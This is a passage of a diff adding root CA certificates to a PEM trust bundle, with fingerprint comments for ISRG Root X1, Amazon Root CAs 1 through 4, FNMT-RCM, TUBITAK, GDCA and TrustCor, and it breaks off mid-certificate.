+lSTAGiecMjvAwNW6qef4BENThe5SId6d9SWDPp5YSy/XZxMOIQIwBeF1Ad5o7Sof +TUwJCA3sS61kFyjndc5FZXIhF8siQQ6ME5g4mlRtm8rifOoCWCKR +-----END CERTIFICATE----- + +# Issuer: CN=ISRG Root X1 O=Internet Security Research Group +# Subject: CN=ISRG Root X1 O=Internet Security Research Group +# Label: "ISRG Root X1" +# Serial: 172886928669790476064670243504169061120 +# MD5 Fingerprint: 0c:d2:f9:e0:da:17:73:e9:ed:86:4d:a5:e3:70:e7:4e +# SHA1 Fingerprint: ca:bd:2a:79:a1:07:6a:31:f2:1d:25:36:35:cb:03:9d:43:29:a5:e8 +# SHA256 Fingerprint: 96:bc:ec:06:26:49:76:f3:74:60:77:9a:cf:28:c5:a7:cf:e8:a3:c0:aa:e1:1a:8f:fc:ee:05:c0:bd:df:08:c6 +-----BEGIN CERTIFICATE----- +MIIFazCCA1OgAwIBAgIRAIIQz7DSQONZRGPgu2OCiwAwDQYJKoZIhvcNAQELBQAw +TzELMAkGA1UEBhMCVVMxKTAnBgNVBAoTIEludGVybmV0IFNlY3VyaXR5IFJlc2Vh +cmNoIEdyb3VwMRUwEwYDVQQDEwxJU1JHIFJvb3QgWDEwHhcNMTUwNjA0MTEwNDM4 +WhcNMzUwNjA0MTEwNDM4WjBPMQswCQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJu +ZXQgU2VjdXJpdHkgUmVzZWFyY2ggR3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBY +MTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAK3oJHP0FDfzm54rVygc +h77ct984kIxuPOZXoHj3dcKi/vVqbvYATyjb3miGbESTtrFj/RQSa78f0uoxmyF+ +0TM8ukj13Xnfs7j/EvEhmkvBioZxaUpmZmyPfjxwv60pIgbz5MDmgK7iS4+3mX6U +A5/TR5d8mUgjU+g4rk8Kb4Mu0UlXjIB0ttov0DiNewNwIRt18jA8+o+u3dpjq+sW +T8KOEUt+zwvo/7V3LvSye0rgTBIlDHCNAymg4VMk7BPZ7hm/ELNKjD+Jo2FR3qyH +B5T0Y3HsLuJvW5iB4YlcNHlsdu87kGJ55tukmi8mxdAQ4Q7e2RCOFvu396j3x+UC +B5iPNgiV5+I3lg02dZ77DnKxHZu8A/lJBdiB3QW0KtZB6awBdpUKD9jf1b0SHzUv +KBds0pjBqAlkd25HN7rOrFleaJ1/ctaJxQZBKT5ZPt0m9STJEadao0xAH0ahmbWn +OlFuhjuefXKnEgV4We0+UXgVCwOPjdAvBbI+e0ocS3MFEvzG6uBQE3xDk3SzynTn +jh8BCNAw1FtxNrQHusEwMFxIt4I7mKZ9YIqioymCzLq9gwQbooMDQaHWBfEbwrbw +qHyGO0aoSCqI3Haadr8faqU9GY/rOPNk3sgrDQoo//fb4hVC1CLQJ13hef4Y53CI +rU7m2Ys6xt0nUW7/vGT1M0NPAgMBAAGjQjBAMA4GA1UdDwEB/wQEAwIBBjAPBgNV +HRMBAf8EBTADAQH/MB0GA1UdDgQWBBR5tFnme7bl5AFzgAiIyBpY9umbbjANBgkq +hkiG9w0BAQsFAAOCAgEAVR9YqbyyqFDQDLHYGmkgJykIrGF1XIpu+ILlaS/V9lZL +ubhzEFnTIZd+50xx+7LSYK05qAvqFyFWhfFQDlnrzuBZ6brJFe+GnY+EgPbk6ZGQ +3BebYhtF8GaV0nxvwuo77x/Py9auJ/GpsMiu/X1+mvoiBOv/2X/qkSsisRcOj/KK +NFtY2PwByVS5uCbMiogziUwthDyC3+6WVwW6LLv3xLfHTjuCvjHIInNzktHCgKQ5 +ORAzI4JMPJ+GslWYHb4phowim57iaztXOoJwTdwJx4nLCgdNbOhdjsnvzqvHu7Ur +TkXWStAmzOVyyghqpZXjFaH3pO3JLF+l+/+sKAIuvtd7u+Nxe5AW0wdeRlN8NwdC +jNPElpzVmbUq4JUagEiuTDkHzsxHpFKVK7q4+63SM1N95R1NbdWhscdCb+ZAJzVc 
+oyi3B43njTOQ5yOf+1CceWxG1bQVs5ZufpsMljq4Ui0/1lvh+wjChP4kqKOJ2qxq +4RgqsahDYVvTH9w7jXbyLeiNdd8XM2w9U/t7y0Ff/9yi0GE44Za4rF2LN9d11TPA +mRGunUHBcnWEvgJBQl9nJEiU0Zsnvgc/ubhPgXRR4Xq37Z0j4r7g1SgEEzwxA57d +emyPxgcYxn/eR44/KJ4EBs+lVDR3veyJm+kXQ99b21/+jh5Xos1AnX5iItreGCc= +-----END CERTIFICATE----- + +# Issuer: O=FNMT-RCM OU=AC RAIZ FNMT-RCM +# Subject: O=FNMT-RCM OU=AC RAIZ FNMT-RCM +# Label: "AC RAIZ FNMT-RCM" +# Serial: 485876308206448804701554682760554759 +# MD5 Fingerprint: e2:09:04:b4:d3:bd:d1:a0:14:fd:1a:d2:47:c4:57:1d +# SHA1 Fingerprint: ec:50:35:07:b2:15:c4:95:62:19:e2:a8:9a:5b:42:99:2c:4c:2c:20 +# SHA256 Fingerprint: eb:c5:57:0c:29:01:8c:4d:67:b1:aa:12:7b:af:12:f7:03:b4:61:1e:bc:17:b7:da:b5:57:38:94:17:9b:93:fa +-----BEGIN CERTIFICATE----- +MIIFgzCCA2ugAwIBAgIPXZONMGc2yAYdGsdUhGkHMA0GCSqGSIb3DQEBCwUAMDsx +CzAJBgNVBAYTAkVTMREwDwYDVQQKDAhGTk1ULVJDTTEZMBcGA1UECwwQQUMgUkFJ +WiBGTk1ULVJDTTAeFw0wODEwMjkxNTU5NTZaFw0zMDAxMDEwMDAwMDBaMDsxCzAJ +BgNVBAYTAkVTMREwDwYDVQQKDAhGTk1ULVJDTTEZMBcGA1UECwwQQUMgUkFJWiBG +Tk1ULVJDTTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBALpxgHpMhm5/ +yBNtwMZ9HACXjywMI7sQmkCpGreHiPibVmr75nuOi5KOpyVdWRHbNi63URcfqQgf +BBckWKo3Shjf5TnUV/3XwSyRAZHiItQDwFj8d0fsjz50Q7qsNI1NOHZnjrDIbzAz +WHFctPVrbtQBULgTfmxKo0nRIBnuvMApGGWn3v7v3QqQIecaZ5JCEJhfTzC8PhxF +tBDXaEAUwED653cXeuYLj2VbPNmaUtu1vZ5Gzz3rkQUCwJaydkxNEJY7kvqcfw+Z +374jNUUeAlz+taibmSXaXvMiwzn15Cou08YfxGyqxRxqAQVKL9LFwag0Jl1mpdIC +IfkYtwb1TplvqKtMUejPUBjFd8g5CSxJkjKZqLsXF3mwWsXmo8RZZUc1g16p6DUL +mbvkzSDGm0oGObVo/CK67lWMK07q87Hj/LaZmtVC+nFNCM+HHmpxffnTtOmlcYF7 +wk5HlqX2doWjKI/pgG6BU6VtX7hI+cL5NqYuSf+4lsKMB7ObiFj86xsc3i1w4peS +MKGJ47xVqCfWS+2QrYv6YyVZLag13cqXM7zlzced0ezvXg5KkAYmY6252TUtB7p2 +ZSysV4999AeU14ECll2jB0nVetBX+RvnU0Z1qrB5QstocQjpYL05ac70r8NWQMet +UqIJ5G+GR4of6ygnXYMgrwTJbFaai0b1AgMBAAGjgYMwgYAwDwYDVR0TAQH/BAUw +AwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYEFPd9xf3E6Jobd2Sn9R2gzL+H +YJptMD4GA1UdIAQ3MDUwMwYEVR0gADArMCkGCCsGAQUFBwIBFh1odHRwOi8vd3d3 +LmNlcnQuZm5tdC5lcy9kcGNzLzANBgkqhkiG9w0BAQsFAAOCAgEAB5BK3/MjTvDD +nFFlm5wioooMhfNzKWtN/gHiqQxjAb8EZ6WdmF/9ARP67Jpi6Yb+tmLSbkyU+8B1 +RXxlDPiyN8+sD8+Nb/kZ94/sHvJwnvDKuO+3/3Y3dlv2bojzr2IyIpMNOmqOFGYM +LVN0V2Ue1bLdI4E7pWYjJ2cJj+F3qkPNZVEI7VFY/uY5+ctHhKQV8Xa7pO6kO8Rf +77IzlhEYt8llvhjho6Tc+hj507wTmzl6NLrTQfv6MooqtyuGC2mDOL7Nii4LcK2N +JpLuHvUBKwrZ1pebbuCoGRw6IYsMHkCtA+fdZn71uSANA+iW+YJF1DngoABd15jm +fZ5nc8OaKveri6E6FO80vFIOiZiaBECEHX5FaZNXzuvO+FB8TxxuBEOb+dY7Ixjp +6o7RTUaN8Tvkasq6+yO3m/qZASlaWFot4/nUbQ4mrcFuNLwy+AwF+mWj2zs3gyLp +1txyM/1d8iC9djwj2ij3+RvrWWTV3F9yfiD8zYm1kGdNYno/Tq0dwzn+evQoFt9B +9kiABdcPUXmsEKvU7ANm5mqwujGSQkBqvjrTcuFqN1W8rB2Vt2lh8kORdOag0wok +RqEIr9baRRmW1FMdW4R58MD3R++Lj8UGrp1MYp3/RgT408m2ECVAdf4WqslKYIYv +uu8wd+RU4riEmViAqhOLUTpPSPaLtrM= +-----END CERTIFICATE----- + +# Issuer: CN=Amazon Root CA 1 O=Amazon +# Subject: CN=Amazon Root CA 1 O=Amazon +# Label: "Amazon Root CA 1" +# Serial: 143266978916655856878034712317230054538369994 +# MD5 Fingerprint: 43:c6:bf:ae:ec:fe:ad:2f:18:c6:88:68:30:fc:c8:e6 +# SHA1 Fingerprint: 8d:a7:f9:65:ec:5e:fc:37:91:0f:1c:6e:59:fd:c1:cc:6a:6e:de:16 +# SHA256 Fingerprint: 8e:cd:e6:88:4f:3d:87:b1:12:5b:a3:1a:c3:fc:b1:3d:70:16:de:7f:57:cc:90:4f:e1:cb:97:c6:ae:98:19:6e +-----BEGIN CERTIFICATE----- +MIIDQTCCAimgAwIBAgITBmyfz5m/jAo54vB4ikPmljZbyjANBgkqhkiG9w0BAQsF +ADA5MQswCQYDVQQGEwJVUzEPMA0GA1UEChMGQW1hem9uMRkwFwYDVQQDExBBbWF6 +b24gUm9vdCBDQSAxMB4XDTE1MDUyNjAwMDAwMFoXDTM4MDExNzAwMDAwMFowOTEL +MAkGA1UEBhMCVVMxDzANBgNVBAoTBkFtYXpvbjEZMBcGA1UEAxMQQW1hem9uIFJv +b3QgQ0EgMTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALJ4gHHKeNXj 
+ca9HgFB0fW7Y14h29Jlo91ghYPl0hAEvrAIthtOgQ3pOsqTQNroBvo3bSMgHFzZM +9O6II8c+6zf1tRn4SWiw3te5djgdYZ6k/oI2peVKVuRF4fn9tBb6dNqcmzU5L/qw +IFAGbHrQgLKm+a/sRxmPUDgH3KKHOVj4utWp+UhnMJbulHheb4mjUcAwhmahRWa6 +VOujw5H5SNz/0egwLX0tdHA114gk957EWW67c4cX8jJGKLhD+rcdqsq08p8kDi1L +93FcXmn/6pUCyziKrlA4b9v7LWIbxcceVOF34GfID5yHI9Y/QCB/IIDEgEw+OyQm +jgSubJrIqg0CAwEAAaNCMEAwDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMC +AYYwHQYDVR0OBBYEFIQYzIU07LwMlJQuCFmcx7IQTgoIMA0GCSqGSIb3DQEBCwUA +A4IBAQCY8jdaQZChGsV2USggNiMOruYou6r4lK5IpDB/G/wkjUu0yKGX9rbxenDI +U5PMCCjjmCXPI6T53iHTfIUJrU6adTrCC2qJeHZERxhlbI1Bjjt/msv0tadQ1wUs +N+gDS63pYaACbvXy8MWy7Vu33PqUXHeeE6V/Uq2V8viTO96LXFvKWlJbYK8U90vv +o/ufQJVtMVT8QtPHRh8jrdkPSHCa2XV4cdFyQzR1bldZwgJcJmApzyMZFo6IQ6XU +5MsI+yMRQ+hDKXJioaldXgjUkK642M4UwtBV8ob2xJNDd2ZhwLnoQdeXeGADbkpy +rqXRfboQnoZsG4q5WTP468SQvvG5 +-----END CERTIFICATE----- + +# Issuer: CN=Amazon Root CA 2 O=Amazon +# Subject: CN=Amazon Root CA 2 O=Amazon +# Label: "Amazon Root CA 2" +# Serial: 143266982885963551818349160658925006970653239 +# MD5 Fingerprint: c8:e5:8d:ce:a8:42:e2:7a:c0:2a:5c:7c:9e:26:bf:66 +# SHA1 Fingerprint: 5a:8c:ef:45:d7:a6:98:59:76:7a:8c:8b:44:96:b5:78:cf:47:4b:1a +# SHA256 Fingerprint: 1b:a5:b2:aa:8c:65:40:1a:82:96:01:18:f8:0b:ec:4f:62:30:4d:83:ce:c4:71:3a:19:c3:9c:01:1e:a4:6d:b4 +-----BEGIN CERTIFICATE----- +MIIFQTCCAymgAwIBAgITBmyf0pY1hp8KD+WGePhbJruKNzANBgkqhkiG9w0BAQwF +ADA5MQswCQYDVQQGEwJVUzEPMA0GA1UEChMGQW1hem9uMRkwFwYDVQQDExBBbWF6 +b24gUm9vdCBDQSAyMB4XDTE1MDUyNjAwMDAwMFoXDTQwMDUyNjAwMDAwMFowOTEL +MAkGA1UEBhMCVVMxDzANBgNVBAoTBkFtYXpvbjEZMBcGA1UEAxMQQW1hem9uIFJv +b3QgQ0EgMjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAK2Wny2cSkxK +gXlRmeyKy2tgURO8TW0G/LAIjd0ZEGrHJgw12MBvIITplLGbhQPDW9tK6Mj4kHbZ +W0/jTOgGNk3Mmqw9DJArktQGGWCsN0R5hYGCrVo34A3MnaZMUnbqQ523BNFQ9lXg +1dKmSYXpN+nKfq5clU1Imj+uIFptiJXZNLhSGkOQsL9sBbm2eLfq0OQ6PBJTYv9K +8nu+NQWpEjTj82R0Yiw9AElaKP4yRLuH3WUnAnE72kr3H9rN9yFVkE8P7K6C4Z9r +2UXTu/Bfh+08LDmG2j/e7HJV63mjrdvdfLC6HM783k81ds8P+HgfajZRRidhW+me +z/CiVX18JYpvL7TFz4QuK/0NURBs+18bvBt+xa47mAExkv8LV/SasrlX6avvDXbR +8O70zoan4G7ptGmh32n2M8ZpLpcTnqWHsFcQgTfJU7O7f/aS0ZzQGPSSbtqDT6Zj +mUyl+17vIWR6IF9sZIUVyzfpYgwLKhbcAS4y2j5L9Z469hdAlO+ekQiG+r5jqFoz +7Mt0Q5X5bGlSNscpb/xVA1wf+5+9R+vnSUeVC06JIglJ4PVhHvG/LopyboBZ/1c6 ++XUyo05f7O0oYtlNc/LMgRdg7c3r3NunysV+Ar3yVAhU/bQtCSwXVEqY0VThUWcI +0u1ufm8/0i2BWSlmy5A5lREedCf+3euvAgMBAAGjQjBAMA8GA1UdEwEB/wQFMAMB +Af8wDgYDVR0PAQH/BAQDAgGGMB0GA1UdDgQWBBSwDPBMMPQFWAJI/TPlUq9LhONm +UjANBgkqhkiG9w0BAQwFAAOCAgEAqqiAjw54o+Ci1M3m9Zh6O+oAA7CXDpO8Wqj2 +LIxyh6mx/H9z/WNxeKWHWc8w4Q0QshNabYL1auaAn6AFC2jkR2vHat+2/XcycuUY ++gn0oJMsXdKMdYV2ZZAMA3m3MSNjrXiDCYZohMr/+c8mmpJ5581LxedhpxfL86kS +k5Nrp+gvU5LEYFiwzAJRGFuFjWJZY7attN6a+yb3ACfAXVU3dJnJUH/jWS5E4ywl +7uxMMne0nxrpS10gxdr9HIcWxkPo1LsmmkVwXqkLN1PiRnsn/eBG8om3zEK2yygm +btmlyTrIQRNg91CMFa6ybRoVGld45pIq2WWQgj9sAq+uEjonljYE1x2igGOpm/Hl +urR8FLBOybEfdF849lHqm/osohHUqS0nGkWxr7JOcQ3AWEbWaQbLU8uz/mtBzUF+ +fUwPfHJ5elnNXkoOrJupmHN5fLT0zLm4BwyydFy4x2+IoZCn9Kr5v2c69BoVYh63 +n749sSmvZ6ES8lgQGVMDMBu4Gon2nL2XA46jCfMdiyHxtN/kHNGfZQIG6lzWE7OE +76KlXIx3KadowGuuQNKotOrN8I1LOJwZmhsoVLiJkO/KdYE+HvJkJMcYr07/R54H +9jVlpNMKVv/1F2Rs76giJUmTtt8AF9pYfl3uxRuw0dFfIRDH+fO6AgonB8Xx1sfT +4PsJYGw= +-----END CERTIFICATE----- + +# Issuer: CN=Amazon Root CA 3 O=Amazon +# Subject: CN=Amazon Root CA 3 O=Amazon +# Label: "Amazon Root CA 3" +# Serial: 143266986699090766294700635381230934788665930 +# MD5 Fingerprint: a0:d4:ef:0b:f7:b5:d8:49:95:2a:ec:f5:c4:fc:81:87 +# SHA1 Fingerprint: 0d:44:dd:8c:3c:8c:1a:1a:58:75:64:81:e9:0f:2e:2a:ff:b3:d2:6e +# SHA256 Fingerprint: 
18:ce:6c:fe:7b:f1:4e:60:b2:e3:47:b8:df:e8:68:cb:31:d0:2e:bb:3a:da:27:15:69:f5:03:43:b4:6d:b3:a4 +-----BEGIN CERTIFICATE----- +MIIBtjCCAVugAwIBAgITBmyf1XSXNmY/Owua2eiedgPySjAKBggqhkjOPQQDAjA5 +MQswCQYDVQQGEwJVUzEPMA0GA1UEChMGQW1hem9uMRkwFwYDVQQDExBBbWF6b24g +Um9vdCBDQSAzMB4XDTE1MDUyNjAwMDAwMFoXDTQwMDUyNjAwMDAwMFowOTELMAkG +A1UEBhMCVVMxDzANBgNVBAoTBkFtYXpvbjEZMBcGA1UEAxMQQW1hem9uIFJvb3Qg +Q0EgMzBZMBMGByqGSM49AgEGCCqGSM49AwEHA0IABCmXp8ZBf8ANm+gBG1bG8lKl +ui2yEujSLtf6ycXYqm0fc4E7O5hrOXwzpcVOho6AF2hiRVd9RFgdszflZwjrZt6j +QjBAMA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/BAQDAgGGMB0GA1UdDgQWBBSr +ttvXBp43rDCGB5Fwx5zEGbF4wDAKBggqhkjOPQQDAgNJADBGAiEA4IWSoxe3jfkr +BqWTrBqYaGFy+uGh0PsceGCmQ5nFuMQCIQCcAu/xlJyzlvnrxir4tiz+OpAUFteM +YyRIHN8wfdVoOw== +-----END CERTIFICATE----- + +# Issuer: CN=Amazon Root CA 4 O=Amazon +# Subject: CN=Amazon Root CA 4 O=Amazon +# Label: "Amazon Root CA 4" +# Serial: 143266989758080763974105200630763877849284878 +# MD5 Fingerprint: 89:bc:27:d5:eb:17:8d:06:6a:69:d5:fd:89:47:b4:cd +# SHA1 Fingerprint: f6:10:84:07:d6:f8:bb:67:98:0c:c2:e2:44:c2:eb:ae:1c:ef:63:be +# SHA256 Fingerprint: e3:5d:28:41:9e:d0:20:25:cf:a6:90:38:cd:62:39:62:45:8d:a5:c6:95:fb:de:a3:c2:2b:0b:fb:25:89:70:92 +-----BEGIN CERTIFICATE----- +MIIB8jCCAXigAwIBAgITBmyf18G7EEwpQ+Vxe3ssyBrBDjAKBggqhkjOPQQDAzA5 +MQswCQYDVQQGEwJVUzEPMA0GA1UEChMGQW1hem9uMRkwFwYDVQQDExBBbWF6b24g +Um9vdCBDQSA0MB4XDTE1MDUyNjAwMDAwMFoXDTQwMDUyNjAwMDAwMFowOTELMAkG +A1UEBhMCVVMxDzANBgNVBAoTBkFtYXpvbjEZMBcGA1UEAxMQQW1hem9uIFJvb3Qg +Q0EgNDB2MBAGByqGSM49AgEGBSuBBAAiA2IABNKrijdPo1MN/sGKe0uoe0ZLY7Bi +9i0b2whxIdIA6GO9mif78DluXeo9pcmBqqNbIJhFXRbb/egQbeOc4OO9X4Ri83Bk +M6DLJC9wuoihKqB1+IGuYgbEgds5bimwHvouXKNCMEAwDwYDVR0TAQH/BAUwAwEB +/zAOBgNVHQ8BAf8EBAMCAYYwHQYDVR0OBBYEFNPsxzplbszh2naaVvuc84ZtV+WB +MAoGCCqGSM49BAMDA2gAMGUCMDqLIfG9fhGt0O9Yli/W651+kI0rz2ZVwyzjKKlw +CkcO8DdZEv8tmZQoTipPNU0zWgIxAOp1AE47xDqUEpHJWEadIRNyp4iciuRMStuW +1KyLa2tJElMzrdfkviT8tQp21KW8EA== +-----END CERTIFICATE----- + +# Issuer: CN=TUBITAK Kamu SM SSL Kok Sertifikasi - Surum 1 O=Turkiye Bilimsel ve Teknolojik Arastirma Kurumu - TUBITAK OU=Kamu Sertifikasyon Merkezi - Kamu SM +# Subject: CN=TUBITAK Kamu SM SSL Kok Sertifikasi - Surum 1 O=Turkiye Bilimsel ve Teknolojik Arastirma Kurumu - TUBITAK OU=Kamu Sertifikasyon Merkezi - Kamu SM +# Label: "TUBITAK Kamu SM SSL Kok Sertifikasi - Surum 1" +# Serial: 1 +# MD5 Fingerprint: dc:00:81:dc:69:2f:3e:2f:b0:3b:f6:3d:5a:91:8e:49 +# SHA1 Fingerprint: 31:43:64:9b:ec:ce:27:ec:ed:3a:3f:0b:8f:0d:e4:e8:91:dd:ee:ca +# SHA256 Fingerprint: 46:ed:c3:68:90:46:d5:3a:45:3f:b3:10:4a:b8:0d:ca:ec:65:8b:26:60:ea:16:29:dd:7e:86:79:90:64:87:16 +-----BEGIN CERTIFICATE----- +MIIEYzCCA0ugAwIBAgIBATANBgkqhkiG9w0BAQsFADCB0jELMAkGA1UEBhMCVFIx +GDAWBgNVBAcTD0dlYnplIC0gS29jYWVsaTFCMEAGA1UEChM5VHVya2l5ZSBCaWxp +bXNlbCB2ZSBUZWtub2xvamlrIEFyYXN0aXJtYSBLdXJ1bXUgLSBUVUJJVEFLMS0w +KwYDVQQLEyRLYW11IFNlcnRpZmlrYXN5b24gTWVya2V6aSAtIEthbXUgU00xNjA0 +BgNVBAMTLVRVQklUQUsgS2FtdSBTTSBTU0wgS29rIFNlcnRpZmlrYXNpIC0gU3Vy +dW0gMTAeFw0xMzExMjUwODI1NTVaFw00MzEwMjUwODI1NTVaMIHSMQswCQYDVQQG +EwJUUjEYMBYGA1UEBxMPR2ViemUgLSBLb2NhZWxpMUIwQAYDVQQKEzlUdXJraXll +IEJpbGltc2VsIHZlIFRla25vbG9qaWsgQXJhc3Rpcm1hIEt1cnVtdSAtIFRVQklU +QUsxLTArBgNVBAsTJEthbXUgU2VydGlmaWthc3lvbiBNZXJrZXppIC0gS2FtdSBT +TTE2MDQGA1UEAxMtVFVCSVRBSyBLYW11IFNNIFNTTCBLb2sgU2VydGlmaWthc2kg +LSBTdXJ1bSAxMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAr3UwM6q7 +a9OZLBI3hNmNe5eA027n/5tQlT6QlVZC1xl8JoSNkvoBHToP4mQ4t4y86Ij5iySr +LqP1N+RAjhgleYN1Hzv/bKjFxlb4tO2KRKOrbEz8HdDc72i9z+SqzvBV96I01INr 
+N3wcwv61A+xXzry0tcXtAA9TNypN9E8Mg/uGz8v+jE69h/mniyFXnHrfA2eJLJ2X +YacQuFWQfw4tJzh03+f92k4S400VIgLI4OD8D62K18lUUMw7D8oWgITQUVbDjlZ/ +iSIzL+aFCr2lqBs23tPcLG07xxO9WSMs5uWk99gL7eqQQESolbuT1dCANLZGeA4f +AJNG4e7p+exPFwIDAQABo0IwQDAdBgNVHQ4EFgQUZT/HiobGPN08VFw1+DrtUgxH +V8gwDgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQEL +BQADggEBACo/4fEyjq7hmFxLXs9rHmoJ0iKpEsdeV31zVmSAhHqT5Am5EM2fKifh +AHe+SMg1qIGf5LgsyX8OsNJLN13qudULXjS99HMpw+0mFZx+CFOKWI3QSyjfwbPf +IPP54+M638yclNhOT8NrF7f3cuitZjO1JVOr4PhMqZ398g26rrnZqsZr+ZO7rqu4 +lzwDGrpDxpa5RXI4s6ehlj2Re37AIVNMh+3yC1SVUZPVIqUNivGTDj5UDrDYyU7c +8jEyVupk+eq1nRZmQnLzf9OxMUP8pI4X8W0jq5Rm+K37DwhuJi1/FwcJsoz7UMCf +lo3Ptv0AnVoUmr8CRPXBwp8iXqIPoeM= +-----END CERTIFICATE----- + +# Issuer: CN=GDCA TrustAUTH R5 ROOT O=GUANG DONG CERTIFICATE AUTHORITY CO.,LTD. +# Subject: CN=GDCA TrustAUTH R5 ROOT O=GUANG DONG CERTIFICATE AUTHORITY CO.,LTD. +# Label: "GDCA TrustAUTH R5 ROOT" +# Serial: 9009899650740120186 +# MD5 Fingerprint: 63:cc:d9:3d:34:35:5c:6f:53:a3:e2:08:70:48:1f:b4 +# SHA1 Fingerprint: 0f:36:38:5b:81:1a:25:c3:9b:31:4e:83:ca:e9:34:66:70:cc:74:b4 +# SHA256 Fingerprint: bf:ff:8f:d0:44:33:48:7d:6a:8a:a6:0c:1a:29:76:7a:9f:c2:bb:b0:5e:42:0f:71:3a:13:b9:92:89:1d:38:93 +-----BEGIN CERTIFICATE----- +MIIFiDCCA3CgAwIBAgIIfQmX/vBH6nowDQYJKoZIhvcNAQELBQAwYjELMAkGA1UE +BhMCQ04xMjAwBgNVBAoMKUdVQU5HIERPTkcgQ0VSVElGSUNBVEUgQVVUSE9SSVRZ +IENPLixMVEQuMR8wHQYDVQQDDBZHRENBIFRydXN0QVVUSCBSNSBST09UMB4XDTE0 +MTEyNjA1MTMxNVoXDTQwMTIzMTE1NTk1OVowYjELMAkGA1UEBhMCQ04xMjAwBgNV +BAoMKUdVQU5HIERPTkcgQ0VSVElGSUNBVEUgQVVUSE9SSVRZIENPLixMVEQuMR8w +HQYDVQQDDBZHRENBIFRydXN0QVVUSCBSNSBST09UMIICIjANBgkqhkiG9w0BAQEF +AAOCAg8AMIICCgKCAgEA2aMW8Mh0dHeb7zMNOwZ+Vfy1YI92hhJCfVZmPoiC7XJj +Dp6L3TQsAlFRwxn9WVSEyfFrs0yw6ehGXTjGoqcuEVe6ghWinI9tsJlKCvLriXBj +TnnEt1u9ol2x8kECK62pOqPseQrsXzrj/e+APK00mxqriCZ7VqKChh/rNYmDf1+u +KU49tm7srsHwJ5uu4/Ts765/94Y9cnrrpftZTqfrlYwiOXnhLQiPzLyRuEH3FMEj +qcOtmkVEs7LXLM3GKeJQEK5cy4KOFxg2fZfmiJqwTTQJ9Cy5WmYqsBebnh52nUpm +MUHfP/vFBu8btn4aRjb3ZGM74zkYI+dndRTVdVeSN72+ahsmUPI2JgaQxXABZG12 +ZuGR224HwGGALrIuL4xwp9E7PLOR5G62xDtw8mySlwnNR30YwPO7ng/Wi64HtloP +zgsMR6flPri9fcebNaBhlzpBdRfMK5Z3KpIhHtmVdiBnaM8Nvd/WHwlqmuLMc3Gk +L30SgLdTMEZeS1SZD2fJpcjyIMGC7J0R38IC+xo70e0gmu9lZJIQDSri3nDxGGeC +jGHeuLzRL5z7D9Ar7Rt2ueQ5Vfj4oR24qoAATILnsn8JuLwwoC8N9VKejveSswoA +HQBUlwbgsQfZxw9cZX08bVlX5O2ljelAU58VS6Bx9hoh49pwBiFYFIeFd3mqgnkC +AwEAAaNCMEAwHQYDVR0OBBYEFOLJQJ9NzuiaoXzPDj9lxSmIahlRMA8GA1UdEwEB +/wQFMAMBAf8wDgYDVR0PAQH/BAQDAgGGMA0GCSqGSIb3DQEBCwUAA4ICAQDRSVfg +p8xoWLoBDysZzY2wYUWsEe1jUGn4H3++Fo/9nesLqjJHdtJnJO29fDMylyrHBYZm +DRd9FBUb1Ov9H5r2XpdptxolpAqzkT9fNqyL7FeoPueBihhXOYV0GkLH6VsTX4/5 +COmSdI31R9KrO9b7eGZONn356ZLpBN79SWP8bfsUcZNnL0dKt7n/HipzcEYwv1ry +L3ml4Y0M2fmyYzeMN2WFcGpcWwlyua1jPLHd+PwyvzeG5LuOmCd+uh8W4XAR8gPf +JWIyJyYYMoSf/wA6E7qaTfRPuBRwIrHKK5DOKcFw9C+df/KQHtZa37dG/OaG+svg +IHZ6uqbL9XzeYqWxi+7egmaKTjowHz+Ay60nugxe19CxVsp3cbK1daFQqUBDF8Io +2c9Si1vIY9RCPqAzekYu9wogRlR+ak8x8YF+QnQ4ZXMn7sZ8uI7XpTrXmKGcjBBV +09tL7ECQ8s1uV9JiDnxXk7Gnbc2dg7sq5+W2O3FYrf3RRbxake5TFW/TRQl1brqQ +XR4EzzffHqhmsYzmIGrv/EhOdJhCrylvLmrH+33RZjEizIYAfmaDDEL0vTSSwxrq +T8p+ck0LcIymSLumoRT2+1hEmRSuqguTaaApJUqlyyvdimYHFngVV3Eb7PVHhPOe +MTd61X8kreS8/f3MboPoDKi3QWwH3b08hpcv0g== +-----END CERTIFICATE----- + +# Issuer: CN=TrustCor RootCert CA-1 O=TrustCor Systems S. de R.L. OU=TrustCor Certificate Authority +# Subject: CN=TrustCor RootCert CA-1 O=TrustCor Systems S. de R.L. 
OU=TrustCor Certificate Authority +# Label: "TrustCor RootCert CA-1" +# Serial: 15752444095811006489 +# MD5 Fingerprint: 6e:85:f1:dc:1a:00:d3:22:d5:b2:b2:ac:6b:37:05:45 +# SHA1 Fingerprint: ff:bd:cd:e7:82:c8:43:5e:3c:6f:26:86:5c:ca:a8:3a:45:5b:c3:0a +# SHA256 Fingerprint: d4:0e:9c:86:cd:8f:e4:68:c1:77:69:59:f4:9e:a7:74:fa:54:86:84:b6:c4:06:f3:90:92:61:f4:dc:e2:57:5c +-----BEGIN CERTIFICATE----- +MIIEMDCCAxigAwIBAgIJANqb7HHzA7AZMA0GCSqGSIb3DQEBCwUAMIGkMQswCQYD +VQQGEwJQQTEPMA0GA1UECAwGUGFuYW1hMRQwEgYDVQQHDAtQYW5hbWEgQ2l0eTEk +MCIGA1UECgwbVHJ1c3RDb3IgU3lzdGVtcyBTLiBkZSBSLkwuMScwJQYDVQQLDB5U +cnVzdENvciBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkxHzAdBgNVBAMMFlRydXN0Q29y +IFJvb3RDZXJ0IENBLTEwHhcNMTYwMjA0MTIzMjE2WhcNMjkxMjMxMTcyMzE2WjCB +pDELMAkGA1UEBhMCUEExDzANBgNVBAgMBlBhbmFtYTEUMBIGA1UEBwwLUGFuYW1h 